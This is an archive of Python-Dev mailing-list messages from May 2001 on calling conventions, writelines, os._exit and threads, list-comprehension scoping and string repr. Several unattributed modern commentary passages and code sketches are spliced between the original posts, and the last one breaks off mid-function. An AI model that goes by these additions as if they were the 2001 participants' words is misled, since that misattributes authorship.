missing is data in support of the idea that calls to those are
frequent enough that it's a NET win to slow plain "O" in order to speed the
additional cases when they happen.  For example, it's not possible for calls
to reduce() to have a high hit rate in real life, because builtin_reduce is
a very expensive function -- there's only so many of those you can cram into
a second even if the calling overhead is 0.  OTOH, add a single branch to
the time it takes to find builtin_type and you've slowed its *total*
execution time significantly.

The implementation of METH_O alone is a pure win by any measure.  So would
be implementing METH_OO alone, or METH_OOO alone, etc.  Mix them, and they
all get slower than they could have been.  All the data we have says METH_O
is the single most important case, and that jibes with common sense, so I
believe it.

If you want to speed everything, fine, do that, but that likely requires a
preprocessing phase so that type signatures don't have to be resolved at
runtime at all.  So long as we're just looking at simple hacks, "the simpler
the better" is good advice and should rule in the absence of compelling
evidence against it.


From tim.one@home.com  Tue May 29 02:14:16 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 21:14:16 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEABKFAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> Because it is a METH_OLDARGS method, you can do
>
> f=open("/tmp/x","w")
> f.writelines("foo\n","bar\n")
>
> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Guido won't, and if he had even a twinge of doubt, Thomas's explanation of
how this bug was introduced in 2.0 would erase it.  The list.append() docs
were arguably unclear when that brouhaha hit, but there's nothing unclear
about the file.writelines() docs.

OTOH, the file.writelines() docs still say a list is required, not "a
sequence" as the 2.0 (+ current) code actually implements.

Hmm.  Wonder whether writelines() should be generalized to allow an iterable
object?
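For comparison, this is where writelines() ended up in Python 3. It takes exactly one argument, which can be any iterable of strings, including a generator. It writes the strings as-is without adding newlines, and it rejects the two-argument call from Martin's example. The sketch uses io.StringIO so no real file is needed.

```python
import io

buf = io.StringIO()
# Any iterable of strings works; writelines() does not append newlines.
buf.writelines(word + "\n" for word in ["foo", "bar"])

# The old METH_OLDARGS spelling, with two separate arguments, is refused.
try:
    buf.writelines("foo\n", "bar\n")
    two_args_accepted = True
except TypeError:
    two_args_accepted = False

print(repr(buf.getvalue()), two_args_accepted)  # 'foo\nbar\n' False
```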


From tim.one@home.com  Tue May 29 02:49:29 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 21:49:29 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010524045938.5228199C83@waltz.rahul.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>

[Aahz]
> (This got brought up because I experimented with os._exit() as a
> possible solution, but that GPFs on Win98SE.)

[Tim]
> Please open a bug report on that, then, with a tiny test case
> if possible.
> This worked fine on Win98SE for me just now:

[Aahz]
> Futz.  *Now* it works.  <sigh>

Now *what* works?  The test case I posted, or the original test case you
tried (which you didn't post)?

> Chalk it up to another unreproducible bug caused by an unstable Win98.

I actually doubt it -- threads are very reliable on Win98, even though little
else is (malloc() is flaky, popen() is a nightmare, etc.).

Here's a recent bug report on a Red Hot box that may be related:

http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735

I have no idea what's supposed to happen if you call os._exit from a
*spawned* thread (perhaps that's what you did too?  I did not) -- threads
are outside the scope of the C std, so I suppose it's a x-platform
crapshoot.


From greg@cosc.canterbury.ac.nz  Tue May 29 03:12:55 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 May 2001 14:12:55 +1200 (NZST)
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>

"Martin v. Loewis" <martin@loewis.home.cs.tu-berlin.de>

> I took a special look at METH_OLDARGS occurrences.

Shouldn't all these be removed? I would have thought
list.append was the last one!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Tue May 29 03:33:58 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 May 2001 14:33:58 +1200 (NZST)
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>
Message-ID: <200105290233.OAA01143@s454.cosc.canterbury.ac.nz>

Samuele Pedroni writes:
> I imagine a (new) function that produces a snapshot of the values in the
> local, free and cell vars of a scope can do the job required for simple
> debugging

I think there should be methods operating directly
on stack frames for debuggers to use.



From jepler@mail.inetnebr.com  Tue May 29 03:32:05 2001
From: jepler@mail.inetnebr.com (Jeff Epler)
Date: Mon, 28 May 2001 21:32:05 -0500
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>; from tim.one@home.com on Mon, May 28, 2001 at 09:49:29PM -0400
References: <20010524045938.5228199C83@waltz.rahul.net> <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>
Message-ID: <20010528213205.A1236@localhost.localdomain>

On Mon, May 28, 2001 at 09:49:29PM -0400, Tim Peters wrote:
> Here's a recent bug report on a Red Hot box that may be related:
> 
> http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735
> 
> I have no idea what's supposed to happen if you call os._exit from a
> *spawned* thread (perhaps that's what you did too?  I did not) -- threads
> are outside the scope of the C std, so I suppose it's a x-platform
> crapshoot.

I wrote that program after the first go-round about _exit and threads,
and when I got behavior I didn't expect, I entered it in the SF bug
tracker.

My reasoning: The documentation for _exit() says it is "used to exit the
child process after a fork()", and my model for thinking about threads
is that they're "child processes, but ...".  Thus, invoking os._exit()
in a thread made sense to me, meaning "ask the OS to destroy this thread
now, but leave my file descriptors, etc., alone for the other threads."

Your suggestion in the tracker of writing the equivalent C program is a
good one, though my suspicion (which I did not voice in the SF report)
was that perhaps the thread which called _exit() held the GIL, in which
case it was in some sense Python's fault that execution didn't continue.
In any case, I don't have the faintest idea how to program threads in
C/pthreads, so I can't write the "equivalent C program".

In fact, a traceback from the hung "sleep(1)" thread shows

(gdb) where
#0  0x4008c656 in __sigsuspend (set=0xbffff5b0) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x4002ee39 in __pthread_wait_for_restart_signal (self=0x400387c0) at pthread.c:934
#2  0x4002b05c in pthread_cond_wait (cond=0x80cf5cc, mutex=0x80cf5d8) at restart.h:34
#3  0x08067ba0 in PyThread_acquire_lock () at eval.c:41
#4  0x08051ff1 in PyEval_RestoreThread () at eval.c:41
#5  0x40019ef9 in floatsleep () at eval.c:41
#6  0x400193fd in time_sleep () at eval.c:41
[...]

While those line numbers look a little fishy (eval.c:41 for all four
frames?), I think this might support my supposition.

Of course, if os._exit() has no intended use in a threaded program, then
this behavior is as good as any.  <wink>

Jeff


From tim.one@home.com  Tue May 29 05:03:38 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 29 May 2001 00:03:38 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010528213205.A1236@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGKFAA.tim.one@home.com>

[Jeff Epler, on
 http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735
]
> My reasoning: The documentation for _exit() says it is "used to exit the
> child process after a fork()", and my model for thinking about threads
> is that they're "child processes, but ...".  Thus, invoking os._exit()
> in a thread made sense to me, meaning "ask the OS to destroy this thread
> now, but leave my file descriptors, etc., alone for the other threads."

You need a Linux expert to address this.  Threads and processes are
different beasts under most flavors of Unix, but Linux confuses them; I've
no idea how _exit() is supposed to work there, and that's why I asked (in
the bug report) what the Linux docs say about that (_exit() is supplied by
your local C library; Python just wraps it).

If what you really wanted was just to abort the thread, use thread.exit()
(see the thread docs).  os._exit() is a dangerous thing even in the best of
conditions; I'm unsure why the Python docs suggest using it.
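Here is a minimal sketch of that advice in Python 3 terms, where the old thread module is spelled _thread. _thread.exit() raises SystemExit in the calling thread only, and threading ignores that exception silently. The worker therefore ends while the main thread and the process carry on. The worker function and the results list are illustrative names.

```python
import _thread
import threading

results = []


def worker():
    results.append("started")
    # Raises SystemExit in this thread only; threading ignores it quietly,
    # so files, other threads and the process itself are left alone.
    _thread.exit()
    results.append("never reached")


t = threading.Thread(target=worker)
t.start()
t.join()
results.append("main thread still running")
print(results)  # ['started', 'main thread still running']
```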

> Your suggestion in the tracker of writing the equivalent C program is a
> good one, though my suspicion (which I did not voice in the SF report)
> was that perhaps the thread which called _exit() held the GIL, in which
> case it was in some sense Python's fault that execution didn't continue.

Ah, makes sense!  Yes, I bet that's what's happening.  If so, there's
nothing Python can do about it:  I'm afraid you did it to yourself.  _exit()
specifically asks that no cleanup processing be done, and when Python calls
it Python never regains control.  If you had done an actual fork, fine, the
*process* doing the _exit() would never come back to Python, but the GIL in
that process has nothing to do with the GIL in the parent process.  But
threads share the same GIL, and if you _exit() from a thread holding the GIL
then no other thread can ever run again.

Looks like it's also platform-dependent:  on Windows, _exit() kills the
process and every thread ever spawned by that process.  Since C doesn't say
anything about threads, that can't be called right or wrong.  Looks like on
Linux _exit() only kills the thread that calls it.

> ...
> Of course, if os._exit() has no intended use in a threaded program,

Right, it doesn't -- unless your program panics and wants to get out ASAP no
matter what the consequences.

> then this behavior is as good as any.  <wink>

And better than most <heh>.


From tim.one@home.com  Tue May 29 05:16:46 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 29 May 2001 00:16:46 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAHKFAA.tim.one@home.com>

[Martin]
> I took a special look at METH_OLDARGS occurrences.

[GregE]
> Shouldn't all these be removed? I would have thought
> list.append was the last one!

I count 42 of them remaining, usually for 0-argument functions.
METH_OLDARGS is faster than METH_VARARGS in that case, and the callee can
distinguish between "called with nothing" and "called with something" under
OLDARGS.  However, they don't appear to catch keyword args:

>>> {}.clear(2)  # complains
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: function takes no arguments
>>> {}.clear(val=12, hohoho=666)  # accepts nonsense silently
>>>
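For the record, current CPython 3.x rejects both calls. Here is a quick check using a small hypothetical helper, raises_type_error:

```python
def raises_type_error(call):
    """Return True if call() raises TypeError, False if it returns normally."""
    try:
        call()
    except TypeError:
        return True
    return False


print(raises_type_error(lambda: {}.clear(2)))                   # True
print(raises_type_error(lambda: {}.clear(val=12, hohoho=666)))  # True
```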

the-more-you-look-the-messier-it-gets-ly y'rs  - tim


From tim.one@home.com  Tue May 29 07:06:19 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 29 May 2001 02:06:19 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEAMKFAA.tim.one@home.com>

ESR> Apparently the Universe is an even more random place than I
ESR> thought.

[Barry A. Warsaw]
> here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs,

That's what Einstein believed (i.e., that it isn't truly random).
Unfortunately, according to another recent thread, Einstein was afraid to
use equations because he didn't want to cut Stephen Hawking's editor's penis
in half -- or something like that.  Whichever, consensus still holds that
Einstein lost this one.

i'd-take-time-to-prove-him-right-but-there's-some-mangled-whitespace-
    crying-for-help-ly y'rs  - tim


From tim.one@home.com  Tue May 29 07:15:07 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 29 May 2001 02:15:07 -0400
Subject: [Python-Dev] RE: What happened to Idle's extend.py?
In-Reply-To: <f9b3eae9.0105231419.7d093237@posting.google.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEANKFAA.tim.one@home.com>

Guido's on vacation.  Anyone have an answer for this?  I don't, and can't
make time to dig into it now.

If you can, David's address showed up as mailto:boogiemorg@aol.com

> -----Original Message-----
> From: python-list-admin@python.org
> [mailto:python-list-admin@python.org]On Behalf Of David Morgenthaler
> Sent: Wednesday, May 23, 2001 6:20 PM
> To: python-list@python.org
> Subject: What happened to Idle's extend.py?
>
>
> Idle-0.3, shipped with Python 1.5.2 had an extend.py module that was
> used to extend Idle. We've used this extensively, building entire
> "applications" as Idle extensions.
>
> Now that we're moving to Python 2.1, we find the same old directions
> for extending Idle (in extend.txt), but there appears to be no
> extend.py in Idle-0.8.
>
> Does anyone know how we can add extensions to Idle-0.8?
>
> Thanks in advance,
> David
> --
> http://mail.python.org/mailman/listinfo/python-list


From mwh@python.net  Tue May 29 09:00:42 2001
From: mwh@python.net (Michael Hudson)
Date: Tue, 29 May 2001 09:00:42 +0100 (BST)
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEAHKFAA.tim.one@home.com>
Message-ID: <Pine.SOL.4.33.0105290854520.24723-100000@yellow.csi.cam.ac.uk>

On Tue, 29 May 2001, Tim Peters wrote:

> [Martin]
> > I took a special look at METH_OLDARGS occurrences.
>
> [GregE]
> > Shouldn't all these be removed? I would have thought
> > list.append was the last one!
>
> I count 42 of them remaining, usually for 0-argument functions.

There are more than that; PyMethodDefs that don't put anything in that
slot in the source are METH_OLDARGS too, and there are quite a few of them
in Modules/ (there are *lots* in _cursesmodule.c, but also in many of the
older modules - gl, rotor were easy to find).  There are also quite a lot
of functions that put a literal zero there.

So METH_OLDARGS is far from dead, sadly.
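Michael's point can be checked mechanically. Below is a rough heuristic scanner, run against a made-up sample table. It lists PyMethodDef entries whose flags field is missing, 0, or METH_OLDARGS. It is not a C parser: it ignores macros and comments and assumes single-field values without commas. The function name old_style_methods is hypothetical.

```python
import re

# One PyMethodDef initializer: {"name", func[, flags[, doc]]}.
# Heuristic only: assumes no commas or braces inside the func/flags fields.
ENTRY = re.compile(
    r'\{\s*"(?P<name>\w+)"\s*,'           # method name
    r'\s*[^,{}]+?'                        # C function, possibly with a cast
    r'(?:\s*,\s*(?P<flags>[^,{}]+?))?'    # optional flags field
    r'\s*(?:,[^{}]*)?\}'                  # optional docstring, closing brace
)
OLD_STYLE = {None, "0", "METH_OLDARGS"}


def old_style_methods(c_source):
    """Names of entries whose flags are missing, 0 or METH_OLDARGS."""
    names = []
    for match in ENTRY.finditer(c_source):
        flags = match.group("flags")
        if (flags.strip() if flags else None) in OLD_STYLE:
            names.append(match.group("name"))
    return names


SAMPLE = '''
static PyMethodDef sample_methods[] = {
    {"append",     (PyCFunction)listappend, METH_O},
    {"clear",      dict_clear},
    {"refresh",    win_refresh, 0},
    {"writelines", file_writelines, METH_OLDARGS, writelines_doc},
    {"split",      split_fn, METH_VARARGS, "split(s, sep) -> list"},
    {NULL, NULL}
};
'''
print(old_style_methods(SAMPLE))  # ['clear', 'refresh', 'writelines']
```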

Cheers,
M.


From tim.one@home.com  Tue May 29 09:04:48 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 29 May 2001 04:04:48 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBBKFAA.tim.one@home.com>

[from Monday, May 21, 2001 1:04 PM]

[Tim]
>> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

[Martin v. Loewis]
> Any reason why PyThreadState_GET isn't used there?

Perhaps somebody's shift key got jammed?

sure-don't-see-a-good-reason-ly y'rs  - tim


From thomas@xs4all.net  Tue May 29 10:52:01 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 29 May 2001 11:52:01 +0200
Subject: [Python-Dev] Re: string repr in 2.1 (fwd)
Message-ID: <20010529115201.J676@xs4all.nl>

Robin apparently ran into a real problem caused by the change in string
repr() semantics. Now, arguably this is his own stupid fault <wink> (and
indeed he argues that himself) but that doesn't mean we shouldn't take this
into account. We could, for instance, revert 2.1.1 to the old behaviour,
giving at least *someone* a reason to switch to 2.1.1 ;) Or we could decide
what the string repr() change really wanted was just for the REPL to print
it like this, in which case the displayhook should fix it, not string_repr.

Opinions ? Ping, IIRC, this was your proposal, so yours would be especially
valuable ;)

----- Forwarded message from Robin Becker <robin@jessikat.fsnet.co.uk> -----

Date: Tue, 29 May 2001 09:58:49 +0100
From: Robin Becker <robin@jessikat.fsnet.co.uk>
To: Thomas Wouters <thomas@xs4all.net>
Cc: python-list@python.org
Subject: Re: string repr in 2.1

In message <20010529102414.P690@xs4all.nl>, Thomas Wouters
<thomas@xs4all.net> writes
>On Tue, May 29, 2001 at 12:47:39AM +0100, Robin Becker wrote:
>> In article <slrn9h5m4o.1hk.scarblac@pino.selwerd.nl>, Remco Gerlich
>> <scarblac@pino.selwerd.nl> writes
>
>> >Since 2.1, string repr uses hexadecimal escapes instead of octal ones.
>
>> yes I guess all those *nix tools that like octal should be whipped and
>> made to obey the malevolent dictator.
>
>Do you have tools you use to parse quoted (repr'd) Python strings that
>handle octal correctly, but don't handle \x and \n\r escape codes ? Which
>ones ? And were you aware that they were going to break sooner or later,
>just because someone can prefer 'readable' escape codes and feed it that
>instead ? :)
>
Yes I have such tools. One is called Acrobat Reader, another is
traditional sed and awk. My DOS grep doesn't seem to like hex; I suppose
I must update it and all other tools.
 
My C compiler understands octal and the newer ones do hex as well.

I can read octal and do arithmetic in it probably easier than hex. I
don't defend the octal representation; it's just very widespread in the
older tools. Our usage of repr was probably stupid, as clearly repr can
change.

How I long for my 18-bit PDP-15 :) what happened to my 15 octal digit
cdc! Oh woe is me! Where are the duodecimal calculators of yore?
-- 
Robin Becker


----- End forwarded message -----
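If the displayhook route were taken, a replacement hook could print strings in the octal style Robin's tools expect and leave repr() itself alone. This is a sketch for Python 3, where sys.displayhook still exists. octal_repr and octal_displayhook are hypothetical names. octal_repr only approximates the old output; for example, it always uses single quotes.

```python
import builtins
import sys


def octal_repr(s):
    """Quote s using octal escapes for control and Latin-1 characters."""
    out = []
    for ch in s:
        code = ord(ch)
        if ch in "\\'":
            out.append("\\" + ch)           # escape backslash and the quote
        elif 32 <= code < 127:
            out.append(ch)                  # printable ASCII as-is
        elif code < 256:
            out.append("\\%03o" % code)     # e.g. newline -> \012
        else:
            out.append(ascii(ch)[1:-1])     # wider characters: \uXXXX form
    return "'" + "".join(out) + "'"


def octal_displayhook(value):
    """Drop-in for sys.displayhook that changes only how str results print."""
    if value is None:
        return
    builtins._ = None  # as the documented displayhook protocol does
    text = octal_repr(value) if isinstance(value, str) else repr(value)
    sys.stdout.write(text + "\n")
    builtins._ = value


print(octal_repr("a\x01\n"))  # 'a\001\012'
# In an interactive session: sys.displayhook = octal_displayhook
```

Because the hook only affects what the interactive prompt echoes, code that calls repr() explicitly, like Robin's, would still see the hex escapes.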

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From akuchlin@mems-exchange.org  Tue May 29 15:04:37 2001
From: akuchlin@mems-exchange.org (Andrew Kuchling)
Date: Tue, 29 May 2001 10:04:37 -0400
Subject: [Python-Dev] Removing doc/howto on python.org
In-Reply-To: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Mon, May 28, 2001 at 02:20:01PM -0400
References: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us> <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>
Message-ID: <20010529100437.A15638@ute.cnri.reston.va.us>

On Mon, May 28, 2001 at 02:20:01PM -0400, Fred L. Drake, Jr. wrote:
>  It looks like I never replied to this.  It's probably dropped off
>your radar, but I'd say the answer is that the files on parrot should
>be discarded sooner rather than later -- when we actually manage to

Done.  Out of paranoia about doing 'rm -rf' within www.python.org's
tree, the files aren't deleted; instead I just moved them to my home
directory on parrot.

--amk


From aahz@rahul.net  Tue May 29 16:47:13 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Tue, 29 May 2001 08:47:13 -0700 (PDT)
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com> from "Tim Peters" at May 28, 2001 09:49:29 PM
Message-ID: <20010529154713.11F8E99C80@waltz.rahul.net>

Tim Peters wrote:
> 
> [Aahz]
> > Futz.  *Now* it works.  <sigh>
> 
> Now *what* works?  The test case I posted, or the original test case you
> tried (which you didn't post)?

My original test case.  I didn't actually preserve it, so the code below
was my attempt to reconstruct it (but I think it's pretty close to the
test case I tried).  Don't worry, if I run into this again, I'll be
*much* more careful about preserving the evidence and fiddling with
variations; last time I just assumed it was pilot error.

from threading import Thread
import os

class Foo(Thread):
    def run(self):
        while 1:
            pass

f = Foo()
f.start()
os._exit(1)


From beazley@cs.uchicago.edu  Tue May 29 17:56:09 2001
From: beazley@cs.uchicago.edu (David Beazley)
Date: Tue, 29 May 2001 11:56:09 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
Message-ID: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>

I'm not sure if this has ever been brought up before (I don't recall
seeing it), but I would like to throw out something that has been
bugging me about list comprehensions for quite some time...

First of all, I have to say that I've really grown to like list
comprehensions a lot.  In fact, I find myself using them in just about
every Python program I've been writing since switching to Python 2.0.
However, I've also been shooting myself in the foot a little more than
usual due to the following issue:

When I write a list comprehension like this:

    s = [ expr(x) for x in t ]

it is *VERY* easy to overlook the fact that the iteration variable "x"
is bound in the local scope (and replaces any previous binding
to "x" that might have existed outside the context of the list
comprehension).    Because of this, I have frequently found myself
debugging the following programming error:

   # Some loop
   for x in r:
       ...
       # bunch of statements
       ...
       s = [expr(x) for x in t]
       ...
       # Try to do something with x.
       # ???? What in the hell is wrong with my program ????
       ...

The main problem is that I conceptually tend to think of the list
comprehension as being some kind of list operator where the index name
is really one of the operands in some sense.  Because of this, it is
*VERY* easy to get in the habit of throwing list comprehensions all
over the place, each of which uses a common index name like x,i,j,
etc.  Of course, this works just fine until you forget that you're
also using x,i,j for some kind of loop variable someplace else :-).

Therefore, I'm wondering if it would make any sense to make the
iterator variables used inside of a list comprehension private in some
manner--either through name mangling or some other technique? For
example:

   s = [expr(x) for x in t]

would get expanded into something roughly like this:

   s = [ ]
   for _mangled_x in t:
       s.append(expr(_mangled_x))
   del _mangled_x

Just as an aside, I have never intentionally used the iterator
variable of a list comprehension after the operation has completed. I
was actually quite surprised with this behavior the first time I saw
it.  I suspect most other programmers would not anticipate this side
effect either.
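For what it's worth, Python 3 did give comprehensions their own scope, so the loop in the example above now behaves as Dave expected. Under 2.x rules, the comprehension below would have rebound x to the last element of t. Here is a small demonstration, with pairs as an illustrative name:

```python
def pairs(r, t):
    seen = []
    for x in r:
        squares = [x * x for x in t]  # this x is local to the comprehension
        seen.append((x, squares))    # so the loop's x is untouched here
    return seen


print(pairs([1, 2], [3, 4]))  # [(1, [9, 16]), (2, [9, 16])]
```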

Comments?

Cheers,

Dave


From nas@python.ca  Tue May 29 18:01:41 2001
From: nas@python.ca (Neil Schemenauer)
Date: Tue, 29 May 2001 10:01:41 -0700
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529100141.B18974@glacier.fnational.com>

David Beazley wrote:
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

I've been bitten by this one once.  It took a while to figure out
the problem.  I'm not sure that we can change it now though.

  Neil


From skip@pobox.com (Skip Montanaro)  Tue May 29 20:03:47 2001
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 29 May 2001 14:03:47 -0500
Subject: [Python-Dev] [Stackless] Stackless for 2.1: Progress Report (fwd)
Message-ID: <15123.62099.473259.545781@beluga.mojam.com>

--RlpqOaIB3+
Content-Type: text/plain; charset=us-ascii
Content-Description: message body text
Content-Transfer-Encoding: 7bit


I pass this along in case anyone here has some ideas for Jeff about how to
work around his problems with pyexpat.c.

Skip


--RlpqOaIB3+
Content-Type: message/rfc822
Content-Description: forwarded message
Content-Transfer-Encoding: 7bit

Message-ID: <3B13E514.21871F19@taupro.com>
References: <3B0A7606.603029F5@taupro.com> <3B0A83F2.2BC22C2@tismer.com> <3B0CB3F4.54BDE760@taupro.com> <3B0D21E4.EA7CCA3F@tismer.com> <3B10CC36.B33589E5@taupro.com>
From: Jeff Rush <jrush@taupro.com>
To: Christian Tismer <tismer@tismer.com>, stackless@starship.python.net
Subject: [Stackless] Stackless for 2.1: Progress Report
Date: Tue, 29 May 2001 13:06:12 -0500

The port is pretty much done, and it passes the standard
Python regression tests, except for the three XML ones.
On those it executes an invalid bytecode and later,
segfaults.

The cause is some code in pyexpat.c that does a PyFrame_New,
passing in a *dummy* codeblock (gross!) that actually
points to an empty text string (instead of real bytecodes),
just to have a codeblock to call PyEval_CallObject() with.

<sigh>

I'm trying to find a workaround for that.

Does anyone have/want to create some regression tests
for Stackless?

-Jeff Rush
_______________________________________________
Stackless mailing list
Stackless@starship.python.net
http://starship.python.net/mailman/listinfo/stackless


--RlpqOaIB3+--


From gward@python.net  Tue May 29 22:21:55 2001
From: gward@python.net (Greg Ward)
Date: Tue, 29 May 2001 17:21:55 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529172155.A8737@gerg.ca>

On 29 May 2001, David Beazley said:
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner--either through name mangling or some other technique? For
> example:

Two ideas occur to me:
  * make the list comprehension a new scoping level, which of course
    is doable now that we have sensible scoping semantics.  Presumably
    the usual warning message about shadowing variables from an
    outer scope will apply; you'll still have the bug in your code,
    but at least Python will tell you about it

  * don't make list comprehensions a separate scope, but add a
    little trickery so that something *like* the "shadowing variable
    from an outer scope" message is emitted
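Greg's second idea, warning instead of changing the scoping, can be sketched as a static check with Python 3's ast module. The check reports a comprehension whose target reuses the name of an enclosing for-loop variable. It is deliberately simple: it resets at nested function and class bodies and ignores subtler cases. The function name shadowed_comprehension_vars is hypothetical.

```python
import ast

SCOPES = (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda, ast.ClassDef)
COMPREHENSIONS = (ast.ListComp, ast.SetComp, ast.DictComp, ast.GeneratorExp)


def _names(target):
    """All plain names bound by an assignment target (handles tuples)."""
    return {node.id for node in ast.walk(target) if isinstance(node, ast.Name)}


def shadowed_comprehension_vars(source):
    """Return (line, name) pairs where a comprehension reuses a loop variable."""
    hits = []

    def visit(node, loop_vars):
        if isinstance(node, SCOPES):
            # A nested function or class body starts with no loop variables.
            for child in ast.iter_child_nodes(node):
                visit(child, frozenset())
        elif isinstance(node, (ast.For, ast.AsyncFor)):
            visit(node.iter, loop_vars)
            inner = loop_vars | _names(node.target)
            for child in node.body + node.orelse:
                visit(child, inner)
        elif isinstance(node, COMPREHENSIONS):
            for gen in node.generators:
                for name in sorted(_names(gen.target) & loop_vars):
                    hits.append((node.lineno, name))
            for child in ast.iter_child_nodes(node):
                visit(child, loop_vars)
        else:
            for child in ast.iter_child_nodes(node):
                visit(child, loop_vars)

    visit(ast.parse(source), frozenset())
    return hits


EXAMPLE = """
for x in r:
    s = [expr(x) for x in t]
    print(x)
ys = [y for y in t]
"""
print(shadowed_comprehension_vars(EXAMPLE))  # [(3, 'x')]
```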

Haven't really thought about backwards compatibility issues...

        Greg


From paulp@ActiveState.com  Tue May 29 22:55:03 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Tue, 29 May 2001 14:55:03 -0700
Subject: [Python-Dev] Re: string repr in 2.1 (fwd)
References: <20010529115201.J676@xs4all.nl>
Message-ID: <3B141AB7.4C6DAFB6@ActiveState.com>

Thomas Wouters wrote:
> 
> Robin apparently ran into a real problem caused by the change in string
> repr() semantics. Now, arguably this is his own stupid fault <wink> (and
> indeed he argues that himself) but that doesn't mean we shouldn't take this
> into account. 

I think it is done now and it is better this way. The pain is over.
Reverting would hurt someone else again.

Displayhook should be used sparingly. One of the major virtues of the
REPL is that it behaves so much like standard Python.

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From tim@digicool.com  Tue May 29 23:54:01 2001
From: tim@digicool.com (Tim Peters)
Date: Tue, 29 May 2001 18:54:01 -0400
Subject: [Python-Dev] Re: Time for the yearly list.append() panic
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEKACAAA.tim@digicool.com>

FYI, I checked in a variation (listobject.c) over the weekend.

Win9x is ultimately hopeless, but we can grow a list there to about 35M
elements now instead of crapping out at < 2M, and it's zippy the whole way
until death.

Win2K (and I *assume* WinNT) benefit much more, as non-linear behavior was
obvious very early there.  Now it's flat and fast until physical RAM is
exhausted, and then it suffers looong (15-30 seconds) "hiccups" at resize
points.

Fred kindly confirmed that Linux isn't hurt.  Its behavior looks the same as
the new Win2K behavior, except that the Linux hiccups are much briefer
(although still obvious when they occur).
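The message doesn't describe the listobject.c change itself. As a generic illustration only (not the checked-in code), the sketch below counts element copies during repeated appends under two hypothetical growth policies. It assumes the worst case, where every resize has to move the whole buffer. Under that assumption a fixed increment makes total copying quadratic in the list length, while growing in proportion to the current size keeps it linear. The function and policy names are made up for the sketch.

```python
def copies_needed(n, grow):
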